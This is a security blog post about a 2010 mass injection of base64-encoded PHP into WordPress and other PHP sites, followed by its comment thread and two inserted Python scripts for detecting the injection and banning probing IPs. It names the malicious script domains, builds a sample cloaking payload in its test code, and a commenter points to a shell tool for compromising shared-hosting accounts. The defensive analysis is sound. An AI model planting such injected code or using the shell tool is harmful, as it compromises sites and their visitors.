New attack today against WordPress

Update 2: Simple clean up solution: http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

Update 1: Note that we are not blaming WordPress here. I am assuming that if the problem were in WordPress itself, the number of infected sites would be much, much bigger. Maybe a plugin is vulnerable, or someone stole lots of passwords. Also, all the hacked sites were on shared hosts; none so far on a private server.

We are seeing multiple reports today of WordPress sites (running the latest version) getting compromised. The initial reports today were restricted to Dreamhost, but now we are seeing the same pattern on blogs hosted at GoDaddy, Bluehost, Media Temple and other places.

So it doesn't look like something specific to one hosting company. The only thing they have in common is that all of them are on shared servers.

All of those sites had this JavaScript added to their pages:

http://www.indesignstudioinfo.com/ls.php
http://zettapetta.com/js.php

The script tag is emitted by a long base64-encoded string injected into their footer.php file (or into every PHP file, in some cases).

More information about the encoded string (and the final decoded code) is here:
http://sucuri.net/malware/entry/MW:MROBH:1

One very interesting thing that is becoming a trend is that the malware also hides itself from Google. This keeps the site from being blacklisted, which makes it harder for the owner to notice.
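A detection and cleanup routine for the injection described above, written as an added example (not Sucuri's cleanup script): it finds eval(base64_decode("...")) statements in PHP files, decodes them to check for the script hosts named in the post and for the Googlebot cloaking, and removes them without leaving blank lines before the opening PHP tag (the problem the comments report with a mass cleanup). It assumes the injected code is a single eval statement, optionally in its own <?php ... ?> tags; the sample footer.php and its payload are constructed here.

```python
import base64
import os
import re
import tempfile

# Domains the post names as the injected <script> sources.
KNOWN_PAYLOAD_HOSTS = ("indesignstudioinfo.com", "zettapetta.com")

# eval(base64_decode("...")) with either quote style, optionally wrapped in
# its own <?php ... ?> tags so the whole injected statement goes at once.
INJECT_RE = re.compile(
    r'(?:<\?php\s*)?eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']'
    r'\s*\)\s*\)\s*;?(?:\s*\?>)?'
)

def find_injections(src: str) -> list:
    """Return one record per eval(base64_decode(...)) statement in src."""
    findings = []
    for m in INJECT_RE.finditer(src):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64: still report, with empty payload
            decoded = ""
        findings.append({
            "decoded": decoded,
            "known_host": any(h in decoded for h in KNOWN_PAYLOAD_HOSTS),
            # The post says the malware hides from Google; a user-agent test in
            # the decoded PHP is a cheap indicator of that cloaking.
            "cloaks_googlebot": "googlebot" in decoded.lower(),
        })
    return findings

def clean_source(src: str) -> str:
    """Remove the injected statements and any blank lines left before the first
    <?php tag: output before the opening tag breaks header()/session calls, the
    "whitespace at the top of every PHP file" problem reported in the comments."""
    cleaned = INJECT_RE.sub("", src)
    if cleaned.lstrip().startswith("<?php"):
        cleaned = cleaned.lstrip()
    return cleaned

def scan_tree(root: str) -> dict:
    """Walk root and map each infected .php path to its injection records."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = find_injections(fh.read())
            if found:
                hits[path] = found
    return hits

# Constructed sample modelled on the post (not the real payload): footer.php
# with the eval statement prepended; the decoded PHP emits the zettapetta.com
# script only to visitors whose user agent is not Googlebot.
_PAYLOAD_PHP = (
    'if(strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"googlebot")===false){'
    'echo "<script src=\\"http://zettapetta.com/js.php\\"></script>";}'
)
SAMPLE_FOOTER = (
    '<?php eval(base64_decode("'
    + base64.b64encode(_PAYLOAD_PHP.encode()).decode()
    + '")); ?>\n\n<?php\n// original theme footer\nwp_footer();\n?>\n'
)

def demo() -> dict:
    """Write the sample into a temporary theme tree and scan it; keys are
    paths relative to the tree root."""
    with tempfile.TemporaryDirectory() as root:
        path = os.path.join(root, "wp-content", "themes", "x", "footer.php")
        os.makedirs(os.path.dirname(path))
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_FOOTER)
        return {os.path.relpath(p, root): v for p, v in scan_tree(root).items()}
```

Run scan_tree() over a copy of the site first and review each decoded payload before writing clean_source() output back; a theme that legitimately uses base64_decode with eval would be flagged too.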

People are talking on the forums already:
http://wordpress.org/support/topic/396524
http://www.webhostingtalk.com/showthread.p..
http://collabtive.o-dyn.de/forum/view..

How are they getting hacked? We have no clue yet. We can only narrow it down to a few possibilities:

  1. Stolen FTP/WP passwords
  2. A bug in WordPress
  3. A bug in a WordPress plugin
  4. Brute-force attacks against the passwords

Send us more information if you know something.

The guys from WP Security Lock did a good thread on the issue. You can read it here.

As always, if you need help to recover from this attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • http://lunchtimemastermind.com Doug Mitchell

    Not sure if this is why…but MediaTemple did a big DB pword autoreset on everyone a couple days ago. It WAS planned but maybe they had this vulnerability in mind when they did.

  • http://www.dirtyphonebook.com Brandon Wilbur

    I've seen so many of these small websites get hacked that I'm starting to doubt that WordPress is at fault; it's something in the shared hosts' configuration.

    WordPress is a bit hacky and has some bad code though, so it's certainly possible that they're at fault, but until I know more I can't say with any certainty.

  • http://jessicamah.com Jessica Mah

    Many hosts use something called Fantastico, which is a script that people use to install their WordPress blogs in the first place. Likely that this is the source of the problem.

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    Jessica: How do you know this is the source of the problem?

  • http://www.blogger.com/profile/04162422038677318548 m

    I recently came across a dreamhost user who had two separate domains, both with WP installed, and both were hacked with the same script. The websites were unrelated beyond the fact that they were installed on the same dreamhost user. This seems like a pretty strange coincidence to me.

  • http://makenothingonline.blogspot.com John

    I spotted this on a couple of wordpress blogs this morning then started avoiding them :-( A lot of malware seems to be targeting wordpress recently :-(

  • Anonymous

    Can't get into my NS File Manager through my own Account Manager.

    I get . . .

    Error
    Invalid UserID and Password!

  • James

    Not just wordpress. I have a joomla site that was just hacked! Hosted on godaddy.

  • James

    Just to follow up with the last post. I have zero wordpress sites on the previously mentioned godaddy account. I just found out that both my joomla site and phpld site were hacked. It is shared hosting.
    James

  • Anonymous

    Hi, I have hosting with Dreamhost, and one of my sites that is written in php, but not WordPress, also has this script injected in the footer, however only in index.php. This definitely is not just a WordPress thing, maybe it's a php thing…

  • http://www.blogger.com/profile/14888817148121175513 Jamie Gilliam

    James,

    I've got a Joomla site that was knocked out early this morning sometime as well. Anyone have any ideas on a fix?

  • james

    I checked several php pages and they were all infected. It was the smaller of the two sites so I decided to wipe it and start fresh. Will get a dedicated ip though. My joomla sites on bluehost that had a dedicated ip were not affected.

  • Anonymous

    This is only affecting PHP scripts in shared hosting, and it seems to reach past WordPress.

    Can anybody post some details of the apps they are running on the affected servers (Name, Version, Installation procedure (tarball, auto-install script, etc.))

  • http://www.sitebyjames.com/ James

    Maybe it's a cloud security breach on linux. There was a major vulnerability last summer with the kernel. That was fairly serious if you ask me.

    Hopefully someone will come forward and take responsibility instead of "it's the host's fault", or "it's WordPress's problem", or "it's a PHP problem", or "it's an Iranian cyber terrorist problem", or it's everybody's problem except my own.

    DIY and Open Source software is dead… Long live the brand name!

  • http://www.sitebyjames.com/ James

    Sorry… I didn't mean to sound like I was some sort of authority on open source software.

    I just think that anything that can knock out more than just a few different websites on a few different hosts is fundamentally a much larger problem.

    This is a really good video… I am not a linux or cloud hosting expert. But this guy is.

    http://www.youtube.com/watch?v=L2SED6sewRw

  • http://www.blogger.com/profile/06217025657058369608 Brad M.

    The issue is not just WordPress, but any PHP. Our old manual PHP site was also infected with this BS. Too bad whois searches for the owner come up blank.

  • Anonymous

    My main gripe with WP is they don't take security seriously enough anymore. Things have changed. The cybercriminals are ahead of the game and winning. WP needs to start providing "security updates and patches." It's that simple. Just like Firefox and SMF and others do.

    You can't just say "we're safe!" when your whole community is getting pounded by guided missiles and your end users are dropping like flies.

    The real reality as of this moment though is it's everyone's problem. If we would stop seeing everything as a competition we might start making some real progress.

    The whole U.S. cybergrid is being threatened and we better get it together and stop being passive about it.

  • Anonymous

    Thanks for that snippet of php – Very thankfully did the trick! Alex

  • Anonymous

    Got an affected Joomla site. It's on a Dreamhost host.

  • http://www.blogger.com/profile/13210697558886179420 abhishek

    I faced the same issue today on my wordpress site hosted on godaddy.

    thanks for the solution posted. it worked.

  • Anonymous

    This is probably one of those attacks where a trojan on a webmaster's computer is reading and forwarding FTP accounts, logs in from a different computer with the FTP account and changes the files.

    Changing the FTP passwords or rights doesn't have much use, unless you detect and remove the trojan on the FTP client computers first (or only use sFTP of course, where passwords are encrypted).

  • Anonymous

    Most infections I came across at customer sites relate to stolen credentials (i.e. FTP accounts). Usually they found a virus infection on their computers later or even prior but did not change their passwords. That those guys infected PHP files (but some hacks, like the one having an iframe with "/grep" in the URL, will also go for HTML files) is just because it's available at nearly every host on the net, so it makes a perfect target.

  • Anonymous

    Furthermore, some of these trojans are also capable of sniffing out FTP credentials from network traffic, so a clean webmaster's computer is sometimes not enough…

  • Anonymous

    One of our client sites, on GoDaddy, running Joomla 1.5.15 is also affected. We installed and uninstalled WordPress on this shared hosting account before, and their current site uses Joomla.

  • http://beingruth.com/ Ruth

    It's definitely not JUST Fantastico. One of my client's sites was hacked & I installed it manually. Bookmarked your script to use for the next client to fall (hopefully none). Fortunately, we had good backups.

  • http://www.blogger.com/profile/16408117576118457613 Riyad

    This is completely circumstantial — but I've been hit by this hack 3 times in the last 2 years. Each time an IFRAME is inserted into the page — the first two times the hack infected *every* single html/php file on my server (private hosting on SliceHost, 16-character passwords, SSH-access only with shared/private key, no other admins besides myself) — the 3rd time the hack only infected a few key php files like page.php and one of my template files.

    I kept search on "WordPress IFRAME injection" and while I didn't find a direct answer — everything was very inconclusive and confusing — I did notice a *trend* of conversations between WordPress and Joomla folks around "TinyMCE" and server-side JavaScript execution possibly being an issue.

    I have no idea how valid this is or how that would even work, but the first thing I did was lock down every account that was higher than "subscriber" in my WordPress install and so far so good…

    I don't know if that means it was TinyMCE, but I do know that I've been hacked the same way from 3 separate "start from scratch because I just got hacked" installs of WordPress ranging from 2.5 to 2.9.1 over the last few years — different hosts (RimuHosting, AWS and Slicehost), different sets of passwords for everything — pretty much all the variables changed each time EXCEPT the user accounts that had "author" access (and subsequently could cause TinyMCE to load) and TinyMCE itself inside the WordPress install.

    I've also always used the "TinyMCE Advanced" plugin to expose more of the TMCE features, maybe that enables some portion of TinyMCE that is allowing this to happen?

    Anyway — just wanted to share my information in case it helps anyone else.

    Good luck out there!

  • Anonymous

    getCookie("pma_visited_theme1");

    Seems to indicate it's a PhpMyAdmin attack.

    -Sasha.

  • Anonymous

    For what it's worth, here are some unsuccessful access attempts, obviously related to the current attacks:


  • Anonymous

    Here's another snippet where he's trying different client strings in an effort to figure out why my machines have been successful in automatically thwarting his new attacks…
    Where you see a 200 indicating success, he's only successful in having his IP address banned, so he moves on to the next IP. Hmm, even Googlebot gets banned, he notices…

    other-access_log.2:95.211.132.75 - - [27/Apr/2010:07:43:04 -0700] "GET /v1/administrator/index.php HTTP/1.1" 404 3380 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))"
    other-access_log.2:95.211.132.70 - - [27/Apr/2010:07:43:05 -0700] "GET /v2/administrator/index.php HTTP/1.1" 404 3380 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))"
    other-access_log.2:95.211.132.78 - - [29/Apr/2010:07:20:31 -0700] "GET /administrator/index.php HTTP/1.1" 404 3181 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    other-access_log.2:95.211.132.70 - - [29/Apr/2010:07:20:33 -0700] "GET /joomla/administrator/index.php HTTP/1.1" 200 20 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    other-access_log.2:95.211.132.78 - - [29/Apr/2010:07:20:44 -0700] "GET /cms/administrator/index.php HTTP/1.1" 404 3181 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    other-access_log.3:95.211.132.69 - - [24/Apr/2010:11:51:42 -0700] "GET /administrator/index.php HTTP/1.1" 404 3380 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))"
    other-access_log.3:95.211.132.74 - - [24/Apr/2010:11:51:44 -0700] "GET /joomla/administrator/index.php HTTP/1.1" 200 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))"

    … if he's reading – I'll give you a hint, dumbass: I've set up Apache's regex to screen all incoming URLs for software I DON'T have installed and instantly ban that IP address, because you're obviously up to no good.

    Where would I get a list of software I DON'T have installed in the first place? Apache error logs. They were once full of probes just like this for non-existent URLs, that is until I set up my auto-blacklist. Just make sure the list doesn't contain a valid URL on your server or else you'll ban legitimate users.
    Other than that, it works really well.

    Here's another Tip: Set up Apache's authentication controls around the admin directory or at least the login script if you can.

    -catbutt
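An offline version of the approach in the comment above, as an added example (not catbutt's Apache configuration): it parses combined-format access log lines, counts requests for admin paths of software the server does not run per client IP, and lists the IPs that deserve a block, noting which ones claimed a Googlebot user agent. The deny-list, the threshold and the sample log lines (TEST-NET addresses in the shape of the comment's grep output) are all constructed here.

```python
import re
from collections import defaultdict

# Paths the probes shown in the comments request. On a server that does not
# run Joomla (or that shop script) no legitimate visitor asks for them. Keep
# every real URL of your own site out of this list, as the comment warns, or
# you will ban legitimate users.
PROBE_PATHS = ("/administrator/index.php", "/get_orders_list.php")
BAN_THRESHOLD = 3  # distinct probe paths from one IP before it is flagged

# Apache combined log line, optionally prefixed with "filename:" as grep
# prints it; the referer/user-agent pair is optional (common log format).
LOG_RE = re.compile(
    r'^(?:[\w.\-]+:)?(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

def parse_line(line: str):
    """Parse one log line into a dict, or None if it is not a request line."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec

def is_probe(path: str) -> bool:
    """True when the path ends in a probe path; the scanner tries /joomla/,
    /cms/, /v1/ ... prefixes in front of the same file, so match on the tail."""
    return any(path.endswith(p) for p in PROBE_PATHS)

def ban_candidates(lines, threshold: int = BAN_THRESHOLD) -> dict:
    """Return {ip: {"paths": [...], "claimed_googlebot": bool}} for every IP
    that requested at least `threshold` distinct probe paths. A Googlebot user
    agent is only a claim (a real crawler is verified by reverse DNS), and the
    comment notes the scanner spoofed it."""
    seen = defaultdict(lambda: {"paths": set(), "claimed_googlebot": False})
    for line in lines:
        rec = parse_line(line)
        if not rec or not is_probe(rec["path"]):
            continue
        entry = seen[rec["ip"]]
        entry["paths"].add(rec["path"])
        if rec["ua"] and "googlebot" in rec["ua"].lower():
            entry["claimed_googlebot"] = True
    return {
        ip: {"paths": sorted(e["paths"]), "claimed_googlebot": e["claimed_googlebot"]}
        for ip, e in seen.items()
        if len(e["paths"]) >= threshold
    }

# Constructed sample in the shape of the comment's grep output, using
# TEST-NET addresses rather than the scanner's real ones.
SAMPLE_LOG = """\
access_log.1:192.0.2.79 - - [03/May/2010:19:29:19 -0700] "GET /administrator/index.php HTTP/1.1" 404 191
access_log.1:192.0.2.79 - - [03/May/2010:19:29:20 -0700] "GET /joomla/administrator/index.php HTTP/1.1" 404 195
access_log.1:192.0.2.79 - - [03/May/2010:19:29:21 -0700] "GET /cms/administrator/index.php HTTP/1.1" 404 193
access_log.1:192.0.2.70 - - [29/Apr/2010:07:20:33 -0700] "GET /v2/administrator/index.php HTTP/1.1" 200 20 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
access_log.1:198.51.100.5 - - [03/May/2010:19:30:01 -0700] "GET /wp-login.php HTTP/1.1" 200 1234
access_log.1:198.51.100.5 - - [03/May/2010:19:30:05 -0700] "GET /index.php HTTP/1.1" 200 9876
"""
```

Feed the output to whatever block list your firewall or .htaccess uses; the threshold exists so that one stray 404 from a visitor who mistyped a URL does not get them banned.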

  • Anonymous

    Hello,,,,,:) :)

    For us the described "BEHAVIOR" at a visitor site browser is "after the visit and any infection".

    So, we did a lot of Internet searching for a description of how to identify and fix infected visitors of these type web pages and were not successful. And, we apologize if a link exists at SUCURI. Any link or description would be great! :) :)

    (i.e.) For WINDOWS, if an infection has occurred:

    What the infection does to the visitor
    Any visually identifiable symptoms
    cookies
    files
    registry entries
    msconfig entries
    etc.

    THANKS for your time, help, and advice!!!!! :) :)

    Jerry

  • Anonymous

    This has nothing to do with WordPress. I saw a video of how the hack is occurring. Basically any shared hosting service is totally vulnerable due to the way PHP runs as the same user for all accounts.

    With a program called goonshell you can see and hack all accounts on bluehost or godaddy. All you have to do is get the file upload.
    http://bbs.progenic.com/Topic11483-32-1.aspx

  • Anonymous

    Dear David,

    Could you please investigate and/or confirm what this previous commenter just said?

    I got hacked for the third time today and am certain I've taken every precaution several times over – but it all won't matter a hill of beans if "with a program called goonshell someone can see and hack all accounts on bluehost or godaddy"!

    Thank you!

  • Anonymous

    My Joomla sites were also attacked, but besides them, the same thing happened on my testing site with osCommerce, ZenCart and WordPress (same site, just different folders) that was on the same Bluehost account as the Joomla sites. The interesting thing is that none of my .php files (outside of Joomla, WordPress…) were infected.
    In the root of each site I found a .php file that was inserting the base64_decode line into other .php files, but they had different names (nom.php, weynn.php, att_ins.php…).

    To fix it, I downloaded my sites and used Find & Replace in Dreamweaver to remove eval(base64_decode("aWYoZnV…fQ==")) and then re-uploaded the site again.

  • http://www.simsarmy.co.uk Simsarmy

    This fix added whitespace at the top of every PHP file. Breaking most if not all scripts on my website. I'd greatly enjoy another script to go through and delete all the whitespace before

  • Anonymous

    Simsarmy, if you have a large site this script will hang up and not finish. That is what it did on my site. Comment out the line that starts with "$rmcode = `find $dir -name "*.php" -type f…." by typing // in front of the line. You should have something that looks like …

    //$rmcode = `find $dir -name "*.php" -type f….

    Save and run this script again. That will remove the extra line from the top of the php pages.

  • Anonymous

    Hosted with Media Temple. They just did an entire DB password reset for customers using shared servers. My WordPress is fine.

  • Anonymous

    Probably just a coincidence but I added my site to seolinkvine.com and the very next day it gets hacked.

  • Anonymous

    Could most of you BE any more stupid? Sites/servers with WP get hacked on numerous different hosting servers… and yet somehow it's the HOST'S problem?

    Wise up and open your eyes.

  • http://www.sitebyjames.com/ James

    Okay, if you've read this far, it's probably about time to get sensational…

    http://www.bing.com/search?q=wordpress+"hacked+by"

    That's 24 Million results.

    I know Goog shows less, and it's probably because it cleans up faster, rather than anything to do with a duplicate content filter.

    http://www.google.com/search?hl=en&q=wordpress+%22hacked+by%22

    That's 24 Million reasons not to assume that wordpress or joomla or open source software is a miracle solution which has no downside.

  • http://www.worldwidedancers.com Daniel

    Hello, can somebody help me? I found this blog topic in Google about WordPress security and I would like to know what has happened with my website:
    Thanks to the error below (with some referrer from China) I have my WordPress website down once a day or every 2 days – 505 internal server error. To make my website run again I always need to delete the .htaccess file. (BTW, the way to make my website run again (deleting the .htaccess file) was told to me by a Bluehost operator.)

    Can anybody help me to explain what is wrong, has my website been hacked, or what do those errors mean? What am I supposed to do now? I'm sure that foreign URLs are something that shouldn't be in my errors (I have about 30 of the same errors in one minute, almost always the same from this Chinese forum:

    [Sun May 23 03:40:59 2010] [error] [client 213.5.70.184] PHP Warning: PHP Startup: Unable to load dynamic library '/usr/local/lib/php/extensions/no-debug-non-zts-20060613/pdo_mysql.so' – /usr/local/lib/php/extensions/no-debug-non-zts-20060613/pdo_mysql.so: cannot open shared object file: No such file or directory in Unknown on line 0, referer: hxxxp://forum.vipearn.c0m/thread-10523-1-1.html

    I have changed http to hxxxp and com to c0m so as not to spam here.

    Can anybody help me to explain how to eliminate this problem? Unfortunately I'm not a PHP/Apache expert at all.
    I would be very happy if anybody can respond. Daniel

  • Anonymous

    Hello Guys,

    I am also a victim. My suggestion is that if you are using any plugins like JavaScript and CSS optimizers then remove them. It's an RFI attack. Hope you all will be happy with this. The attacker first distributes a free program (open source) which works fine but he puts a security hole in it for later use. He wins our faith and then attacks.

  • http://www.lampwebdevelopers.com/199/web-developement/security-and-anti-spam/website-hack-through-tinymce-filemanager-plugin/ Stan

    Another hack here through an old Mambo installation. I think this is purely a matter of file uploaders not being secured. These are part of most WYSIWYG editors like TinyMCE.
    More info on our case is here:
    http://www.lampwebdevelopers.com/199/web-developement/security-and-anti-spam/website-hack-through-tinymce-filemanager-plugin/

  • Ed Alexander

    I was going to post some great info here, but the limitations set on commenting have totally turned me off and pissed me off, so if anyone wants a permanent solution to being hacked just Google "bulletproof security plugin".

    • http://intensedebate.com/people/dremeda dremeda

      My apologies for your dislike of our commenting system. If you have recommendations, please leave some constructive feedback, we're always interested in improving our reader experience.

      Dre

      • Ed Alexander

        Hi,
        Sorry I got so irate there, but I had just finished typing about 30 minutes' worth of info and went to submit the post and I got the pop-up that I had gone over the maximum allowed character limitation, so I kept skimming the content down and, in a totally amateur move, I did not write the post on my end locally and then copy and paste the info here. Yeah, I know, rookie mistake. ;) Anyway the posting window had finally had enough of me and decided to crash. So all the content was lost. My mistake for not working from a local copy. Did a knee-jerk spaz moment of anger there. Sorry about that. ;)
        Thanks,
        Ed

  • Steve

    It seems 123-reg have become victim to this some 6 months on. Other 123-reg PHP-based scripts have also been hacked in this way.
